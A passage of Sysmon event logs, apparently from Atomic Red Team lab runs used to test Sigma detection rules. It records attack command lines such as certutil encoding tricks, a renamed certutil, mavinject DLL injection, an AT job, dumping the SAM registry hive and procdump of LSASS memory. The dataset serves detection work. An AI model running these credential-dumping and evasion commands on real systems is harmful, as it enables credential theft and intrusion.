(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-DA3F-5D31-0000-00104C173C00","ProcessId":4832,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:03.223"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4061,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:03.235828Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Certutil Command"],"event":{"Event":{"EventData":{"CommandLine":"certutil.exe -encode c:\\file.exe file.txt","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"CertUtil.exe","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4","Image":"C:\\Windows\\System32\\certutil.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"certutil.exe -encode c:\\file.exe file.txt\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-DA3F-5D31-0000-00104C173C00","ParentProcessId":4832,"ProcessGuid":"747F3D96-DA3F-5D31-0000-00109E193C00","ProcessId":1260,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:03.261"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4062,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:03.309488Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Suspicious Certutil Command"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"certutil.exe -decode file.txt c:\\file.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-DA3F-5D31-0000-0010562E3C00","ProcessId":4020,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:03.786"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4063,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:03.961276Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Suspicious Certutil Command"],"event":{"Event":{"EventData":{"CommandLine":"certutil.exe -decode file.txt c:\\file.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"CertUtil.exe","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4","Image":"C:\\Windows\\System32\\certutil.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"certutil.exe -decode file.txt c:\\file.exe\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-DA3F-5D31-0000-0010562E3C00","ParentProcessId":4020,"ProcessGuid":"747F3D96-DA3F-5D31-0000-001022323C00","ProcessId":6888,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:03.818"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4064,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:03.974754Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Copy From or To System32"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"cmd.exe /c copy %%windir%%\\\\system32\\\\certutil.exe %%temp%%tcm.tmp\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-DA40-5D31-0000-00106A543C00","ProcessId":6572,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:04.236"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4066,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:04.270645Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Copy From or To System32"],"event":{"Event":{"EventData":{"CommandLine":"cmd.exe /c copy C:\\Windows\\\\system32\\\\certutil.exe C:\\Users\\IEUser\\AppData\\Local\\Temptcm.tmp","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"cmd.exe /c copy %windir%\\\\system32\\\\certutil.exe %temp%tcm.tmp\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-DA40-5D31-0000-00106A543C00","ParentProcessId":6572,"ProcessGuid":"747F3D96-DA40-5D31-0000-0010B1553C00","ProcessId":5168,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:04.256"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4067,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:04.294575Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Suspicious Certutil Command"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"cmd.exe /c %%temp%%tcm.tmp -decode c:\\file.exe file.txt\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-DA40-5D31-0000-0010CF5A3C00","ProcessId":4336,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:04.316"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4068,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:04.333864Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Suspicious Certutil Command"],"event":{"Event":{"EventData":{"CommandLine":"cmd.exe /c C:\\Users\\IEUser\\AppData\\Local\\Temptcm.tmp -decode c:\\file.exe file.txt","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"cmd.exe /c %temp%tcm.tmp -decode c:\\file.exe file.txt\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-DA40-5D31-0000-0010CF5A3C00","ParentProcessId":4336,"ProcessGuid":"747F3D96-DA40-5D31-0000-0010565D3C00","ProcessId":3932,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:04.346"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4069,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:04.361122Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Suspicious Certutil Command"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Users\\IEUser\\AppData\\Local\\Temptcm.tmp -decode c:\\file.exe file.txt","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"CertUtil.exe","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4","Image":"C:\\Users\\IEUser\\AppData\\Local\\Temptcm.tmp","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"cmd.exe /c C:\\Users\\IEUser\\AppData\\Local\\Temptcm.tmp -decode c:\\file.exe file.txt","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-DA40-5D31-0000-0010565D3C00","ParentProcessId":3932,"ProcessGuid":"747F3D96-DA40-5D31-0000-0010AB5F3C00","ProcessId":6260,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:04.381"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4070,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:04.412850Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["MavInject Process Injection"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\mavinject.exe\" 3912 /INJECTRUNNING C:\\AtomicRedTeam\\atomics\\T1055\\src\\x64\\T1055.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft Application Virtualization Injector","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=3627AD593F3A956FA07382914B52AAB5CE98C817,MD5=72D5E2A3FF5D88C891E0DF1AA28B6422,SHA256=ABB99F7CFD3E9EB294501AAFA082A8D4841278CC39A4FB3DFF9942CA1F71A139,IMPHASH=96A5873241D90136570C05E55F0B5B2A","Image":"C:\\Windows\\System32\\mavinject.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-DA4B-5D31-0000-0010CB413D00","ProcessId":2604,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:15.754"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4078,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:15.776993Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Interactive AT Job"],"event":{"Event":{"EventData":{"CommandLine":"at 13:20 /interactive cmd","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Schedule service command line interface","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=EC6F04AA61D8F0FA0945EBFC58F6CC7CEBB1377A,MD5=F4416891D11BBA6975E5067FA10507C8,SHA256=73A9A6A4C9CF19FCD117EB3C430E1C9ACADED31B42875BA4F02FA61DA1B8A6DC,IMPHASH=FA9A9B0D471E4B5F3683C346C3D880BD","Image":"C:\\Windows\\System32\\at.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"at 13:20 /interactive cmd\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-DA6A-5D31-0000-0010B2953E00","ParentProcessId":5036,"ProcessGuid":"747F3D96-DA6A-5D31-0000-001004983E00","ProcessId":3864,"Product":"Microsoft® Windows® Operating System","RuleName":"Persistence - Scheduled Task Management AT","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:46.087"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4083,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:46.094355Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Indirect Command Execution"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\calc.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"c:\\windows\\system32\\","Description":"Windows Calculator","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729","Image":"C:\\Windows\\System32\\calc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"forfiles /p c:\\windows\\system32 /m notepad.exe /c calc.exe","ParentImage":"C:\\Windows\\System32\\forfiles.exe","ParentProcessGuid":"747F3D96-DA72-5D31-0000-001056513F00","ParentProcessId":3680,"ProcessGuid":"747F3D96-DA72-5D31-0000-0010B1543F00","ProcessId":3160,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:54.160"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4101,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:54.165319Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-07-19 15:10:52.699","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"747F3D96-DD47-5D31-0000-001015874900","ProcessId":5840,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\3ivx11ib\\3ivx11ib.dll","UtcTime":"2019-07-19 15:10:52.699"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":4109,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-07-19T15:10:52.700901Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\whoami.exe\" /user","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-DD47-5D31-0000-001015874900","ParentProcessId":5840,"ProcessGuid":"747F3D96-DD8B-5D31-0000-001094584A00","ProcessId":5792,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 15:11:07.987"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4110,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T15:11:07.994501Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg save HKLM\\sam sam\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-DD47-5D31-0000-001015874900","ParentProcessId":5840,"ProcessGuid":"747F3D96-DD95-5D31-0000-001075964A00","ProcessId":7140,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 15:11:17.211"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4117,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T15:11:17.224751Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Usage of Sysinternals Tools","Suspicious Use of Procdump on LSASS","Renamed ProcDump","LSASS Memory Dumping","Suspicious Use of Procdump","Procdump Usage"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-DD47-5D31-0000-001015874900","ParentProcessId":5840,"ProcessGuid":"747F3D96-DD9E-5D31-0000-00106E2C4B00","ProcessId":5488,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 15:11:26.626"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4124,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T15:11:26.642464Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Shadow Copies Creation Using Operating 